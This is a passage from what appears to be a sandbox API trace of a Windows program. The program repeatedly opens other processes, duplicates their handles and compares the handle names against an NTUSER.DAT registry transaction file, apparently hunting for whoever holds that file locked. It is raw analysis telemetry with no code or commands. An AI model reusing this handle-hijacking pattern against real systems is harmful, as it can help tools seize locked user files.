(_Str1="\\etc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.805] CloseHandle (hObject=0x680) returned 1 [0153.805] CloseHandle (hObject=0x62c) returned 1 [0153.806] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.806] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.806] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.806] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.807] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.807] CloseHandle (hObject=0x670) returned 1 [0153.807] CloseHandle (hObject=0x680) returned 1 [0153.807] CloseHandle (hObject=0x62c) returned 1 [0153.807] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.807] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.808] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.808] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.808] CloseHandle (hObject=0x670) returned 1 [0153.808] CloseHandle (hObject=0x680) returned 1 [0153.808] CloseHandle (hObject=0x62c) returned 1 [0153.809] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.809] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.809] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.810] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.810] CloseHandle (hObject=0x670) returned 1 [0153.810] CloseHandle (hObject=0x680) returned 1 [0153.810] CloseHandle (hObject=0x62c) returned 1 [0153.810] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.810] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.810] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.811] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.811] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.812] CloseHandle (hObject=0x670) returned 1 [0153.812] CloseHandle (hObject=0x680) returned 1 [0153.812] CloseHandle (hObject=0x62c) returned 1 [0153.812] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.812] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.812] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.813] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.813] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.813] CloseHandle (hObject=0x670) returned 1 [0153.813] CloseHandle (hObject=0x680) returned 1 [0153.813] CloseHandle (hObject=0x62c) returned 1 [0153.814] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.814] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.814] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.814] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.815] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.815] CloseHandle (hObject=0x670) returned 1 [0153.815] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.815] CloseHandle (hObject=0x680) returned 1 [0153.815] CloseHandle (hObject=0x62c) returned 1 [0153.815] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.815] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.815] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.816] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.817] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.817] CloseHandle (hObject=0x670) returned 1 [0153.817] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.817] CloseHandle (hObject=0x680) returned 1 [0153.817] CloseHandle (hObject=0x62c) returned 1 [0153.817] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.817] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.817] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.821] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.822] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.822] CloseHandle (hObject=0x670) returned 1 [0153.822] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.822] CloseHandle (hObject=0x680) returned 1 [0153.822] CloseHandle (hObject=0x62c) returned 1 [0153.822] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.822] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x268, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.822] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.823] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.823] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.823] CloseHandle (hObject=0x670) returned 1 [0153.823] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.823] CloseHandle (hObject=0x680) returned 1 [0153.823] CloseHandle (hObject=0x62c) returned 1 [0153.823] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.824] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.824] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.824] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.825] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.825] CloseHandle (hObject=0x670) returned 1 [0153.825] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.825] CloseHandle (hObject=0x680) returned 1 [0153.825] CloseHandle (hObject=0x62c) returned 1 [0153.825] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.825] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x274, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.825] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.826] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.826] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.827] CloseHandle (hObject=0x670) returned 1 [0153.827] _wcsicmp (_Str1="\\keysvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.827] CloseHandle (hObject=0x680) returned 1 [0153.827] CloseHandle (hObject=0x62c) returned 1 [0153.827] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.827] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.827] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.828] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.828] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.828] CloseHandle (hObject=0x670) returned 1 [0153.828] CloseHandle (hObject=0x680) returned 1 [0153.828] CloseHandle (hObject=0x62c) returned 1 [0153.828] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.828] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.829] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.830] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.830] CloseHandle (hObject=0x670) returned 1 [0153.830] CloseHandle (hObject=0x680) returned 1 [0153.830] CloseHandle (hObject=0x62c) returned 1 [0153.830] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.830] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.831] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.831] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.832] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.832] CloseHandle (hObject=0x670) returned 1 [0153.832] CloseHandle (hObject=0x680) returned 1 [0153.832] CloseHandle (hObject=0x62c) returned 1 [0153.832] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.832] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x558, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.832] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.833] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.833] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.834] CloseHandle (hObject=0x670) returned 1 [0153.834] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0153.834] CloseHandle (hObject=0x680) returned 1 [0153.834] CloseHandle (hObject=0x62c) returned 1 [0153.834] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.834] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x570, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.834] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.835] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.835] CloseHandle (hObject=0x670) returned 1 [0153.835] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0153.835] CloseHandle (hObject=0x680) returned 1 [0153.835] CloseHandle (hObject=0x62c) returned 1 [0153.835] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.835] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.836] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.837] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.837] CloseHandle (hObject=0x670) returned 1 [0153.837] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0153.837] CloseHandle (hObject=0x680) returned 1 [0153.837] CloseHandle (hObject=0x62c) returned 1 [0153.837] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.837] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.840] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.842] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.842] CloseHandle (hObject=0x670) returned 1 [0153.842] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.842] CloseHandle (hObject=0x680) returned 1 [0153.842] CloseHandle (hObject=0x62c) returned 1 [0153.842] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x62c [0153.842] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.842] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.843] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.843] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.843] CloseHandle (hObject=0x670) returned 1 [0153.843] _wcsicmp (_Str1="\\catdb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.843] CloseHandle (hObject=0x680) returned 1 [0153.843] CloseHandle (hObject=0x62c) returned 1 [0153.843] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x444) returned 0x62c [0153.843] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.844] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.844] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.846] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.846] CloseHandle (hObject=0x670) returned 1 [0153.846] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.846] CloseHandle (hObject=0x680) returned 1 [0153.846] CloseHandle (hObject=0x62c) returned 1 [0153.846] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.846] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.847] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.847] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.848] CloseHandle (hObject=0x670) returned 1 [0153.848] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.848] CloseHandle (hObject=0x680) returned 1 [0153.848] CloseHandle (hObject=0x62c) returned 1 [0153.848] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.848] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.848] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.849] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.849] CloseHandle (hObject=0x670) returned 1 [0153.849] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.849] CloseHandle (hObject=0x680) returned 1 [0153.849] CloseHandle (hObject=0x62c) returned 1 [0153.849] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.849] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.849] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.850] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.851] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.852] CloseHandle (hObject=0x670) returned 1 [0153.852] CloseHandle (hObject=0x680) returned 1 [0153.852] CloseHandle (hObject=0x62c) returned 1 [0153.852] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.852] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x144, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.852] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.852] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.853] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.853] CloseHandle (hObject=0x670) returned 1 [0153.853] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.853] CloseHandle (hObject=0x680) returned 1 [0153.853] CloseHandle (hObject=0x62c) returned 1 [0153.853] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.853] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x16c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.854] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.855] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.855] CloseHandle (hObject=0x670) returned 1 [0153.855] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.855] CloseHandle (hObject=0x680) returned 1 [0153.855] CloseHandle (hObject=0x62c) returned 1 [0153.855] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0153.855] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.855] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.856] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.860] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.860] CloseHandle (hObject=0x670) returned 1 [0153.860] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0153.860] CloseHandle (hObject=0x680) returned 1 [0153.860] CloseHandle (hObject=0x62c) returned 1 [0153.860] OpenProcess 